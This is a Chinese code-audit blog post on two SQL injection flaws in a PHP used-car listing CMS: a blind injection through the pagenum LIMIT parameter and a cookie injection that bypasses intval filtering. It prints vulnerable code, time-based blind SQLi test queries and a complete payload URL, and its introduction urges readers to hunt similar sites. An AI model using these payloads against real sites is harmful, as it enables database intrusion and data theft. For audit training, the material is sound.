0x00 前记
这里的漏洞分析只挑选了两个觉得有新意的点来说,整个cms肯定还是有很多漏洞,可以说是值得练手的一款cms,并且由于是根据某付费cms二次制作完成,因此市面上这类汽车网源码肯定也是千疮百孔,刷洞的可以走起~

0x01 cms简介
大泉州汽车网整站程序是一个以PHP+MySQL进行开发的二手车发布网站源码。
大泉州汽车网整站程序PHP生成html开源版 更新日志:
V1.1.2
1.增加手机版,可以绑定二级域名访问。如http://m.myname.com 绑定到m目录即可, 手机版模版位置:templates/default/m/
2.修正车行商铺首页和车型图片路径不显示
3.修正车型中心图片路径不对。
4.修正用户注册CSS路径。
5.修正用户登录CSS路径。
6.修正百度地图,不需参数可以直接定位
源码下载地址:http://down.chinaz.com/soft/39115.htm
demo地址:http://www.dqzqcw.com/

0x02 漏洞分析
下面两个洞是不那么常见的洞,或者说跟平时挖掘思路不太一致,这里拿出来分享一下,也给那些代码审计新手一点新的思路。现在由于大多数参数都有过滤机制,因此一些常见的注入漏洞可以说是很难找了,笔者如果想要找sql注入漏洞,那么喜欢挑像in类型的注入或者limit、order by这种,这里包含的参数正常都是数字类型,也就是说无需单引号包裹的,所以如果没做数字类型的检查,那么这里很可能就会存在问题,下面进入正篇!

  • limit注入
    这里漏洞代码位于index/2s.php第288行

    // 每页显示条数
    if (isset($_GET['pagenum'])) {
      setMyCookie("pagenum", $_GET['pagenum'], time() + COOKIETIME);
    } else {
      setMyCookie("pagenum", 32, time() + COOKIETIME);
    }
    

    这里传入参数pagenum,然后将值赋到cookie里去(这也是这款cms的特色之处,所有的参数均会存储到cookie,然后在后面做处理的时候从cookie中取值),接着我们跟进pagenum参数来到index/2s.php第301行

    include(INC_DIR . 'Page.class.php');
    $Page = new Page($db -> tb_prefix . 'cars', $where, '*', $_COOKIE['pagenum'], $orderby);
    $listnum = $Page -> total_num;
    $list = $Page -> get_data();
    

    这里可以看到我们的pagenum参数已经是从cookie中取值来进行操作,继续跟进Page函数来到include/Page.class.php第33行

    * 
       * @param string $tbname 要操作的表名
       * @param string $where 定位条件
       * @param string $field 要查询的字段
       * @param string $pageSize 每页显示数量
       * @param string $orderBy 排序方式
       */
      function Page($tbname, $where = '1=1', $field = '*', $page_size = 20, $order_by = '', $group_by = '') {
          !mysql_ping() && exit('mysql can not connect!');
    
          if (!empty($page_size)) $this -> page_size = $page_size; 
          // 获取总记录条数
          $sql = "SELECT count(*) as row_num FROM $tbname WHERE $where";
          $row_num = mysql_fetch_array(mysql_query($sql));
          $this -> total_num = $row_num['row_num'];
          //$this -> total_page = ceil($this -> total_num / $page_size); 
          // 当前page
          $page = isset($_GET['page']) && intval($_GET['page']) > 0 ? intval($_GET['page']) : 1;
          $this -> page = ($page < $this -> total_page || $this -> total_page == 0) ? $page : $this -> total_page; 
          // 计算查询的起始值
          $start = ($this -> page - 1) * $page_size; 
          // 查询结果
    
          if($page_size==0){
              $sql = "SELECT $field FROM $tbname WHERE $where" .  ($group_by ? ' GROUP BY ' . $group_by : '').($order_by ? ' ORDER BY ' . $order_by : '') ;
          }else{
              $this -> total_page = ceil($this -> total_num / $page_size); 
              $sql = "SELECT $field FROM $tbname WHERE $where" . ($group_by ? ' GROUP BY ' . $group_by : '').($order_by ? ' ORDER BY ' . $order_by : '') . " LIMIT $start,$this->page_size";
          }
    
          $result = mysql_query($sql);
    
          $data = array();
          while ($row = mysql_fetch_assoc($result)) {
              $data[] = $row;
          } 
          $this -> data = $data;
      }
    

    这里pagenum对应的参数为$page_size参数,因此这里我们需要来看看page_size参数处于sql语句中的哪个位置。这里可以看到第28行处于limit之后,并且这里没有开启错误回显,因此该漏洞为前台无限制limit盲注漏洞。
    我们知道在遇到limit注入时,使用procedure analyse即可实现注入,但是网上搜到的大多是利用报错来进行注入,这里只能盲注,因此也花了不少时间来测试sql语句。
    常见的limit报错语句如下

    MariaDB [car]> select * from simcms_cars limit 0,1 procedure analyse(extractvalue(rand(),concat(0x7e,user())),1);
    ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'
    

    这里想要改成时间盲注语句也很简单,只要对user()那里做修改即可
    时间盲注语句如下

    MariaDB [car]> select * from simcms_cars limit 0,1 procedure analyse((extractvalue(rand(),concat(0x3a,(IF(ascii(MID(user(),1,1))=114, BENCHMARK(3000000,SHA1(1)),1))))),1);
    ERROR 1105 (HY000): XPATH syntax error: ':0'
    

    最后我们来到实战中做检验,完整的payload如下

    http://127.0.0.1/?m=2s&pagenum=1 PROCEDURE analyse((extractvalue(rand(),concat(0x3a,(IF(ascii(MID(user(),1,1))=114, BENCHMARK(6000000,SHA1(1)),1))))),1)
    



    延时差距还是很明显的~

  • cookie注入
    这个漏洞其实可以说是逻辑上的漏洞,我们刚才看到了程序的处理流程,先将GET或者POST参数给赋值到cookie里,然后再从cookie里调用,那么这中间会出现什么问题呢?
    if ($arr_c['0'] == "p") {
          if (isset($arr_c[1])) {
              setMyCookie("price", intval($arr_c[1]), time() + COOKIETIME);
          } 
          if (isset($_COOKIE['price']) and $_COOKIE['price'] == 0) {
              setMyCookie("price", '', time() - COOKIETIME);
          } 
      } 
      // 车龄
      elseif ($arr_c['0'] == "a") {
          if (isset($arr_c[1])) {
              setMyCookie("age", intval($arr_c[1]), time() + COOKIETIME);
          } 
          if (isset($_COOKIE['age']) and $_COOKIE['age'] == 0) {
              setMyCookie("age", '', time() - COOKIETIME);
          } 
      } 
      // 车型
      elseif ($arr_c['0'] == "m") {
          if (isset($arr_c[1])) {
              setMyCookie("model", intval($arr_c[1]), time() + COOKIETIME);
          } 
          if (isset($_COOKIE['model']) and $_COOKIE['model'] == 0) {
              setMyCookie("model", '', time() - COOKIETIME);
          } 
      }
    
    这里随便抽取了一段,可以看到传进来的参数大概是p_1或者a_2这种,下划线前面的表示类型,下划线后面的表示数值,并且会对数值做intval处理,那么这里最简单的思路就是来找一找有没有漏网之鱼,就是没有做intval处理,并且最终进入到sql语句里的参数,当然这里也有,不过不是本文的讨论重点。
    这里就以上面的车型为例,这里假如GET为m_1,那么cookie中的model值则为1,然后我们跟进这个cookie['model']
    来到190行
    if (isset($_COOKIE['model']) and $_COOKIE['model']<>0) {
      $where .= " and p_model = ".$_COOKIE['model'];
    }
    
    这里可以看到直接拼接进了where里,最终就进入了上面limit注入里的Page函数。
    回过头来看,这个model参数由于在赋值时会进入intval函数的处理,因此用常规的直接拼接思路肯定是不可以的,但是这里出现的问题就是cookie值没有进行初始化,也就是说我们现在抓包然后赋值一个新的cookie值,就可以直接绕过这个从GET到COOKIE的处理,也就绕过了intval函数的处理,下面开始抓包演示!

    这里可以看到cookie中的m值为41,那么想要绕过前面的从GET处理到COOKIE处理,采用直接cookie赋值的方法即可~

    可以看到延时成功~

0x03 总结
这里漏洞利用起来也不是很复杂,只是姿势可能跟平时不太一样,所以拿出来分享一下~
上述如有不当之处,敬请指出

点击收藏 | 1 关注 | 1
登录 后跟帖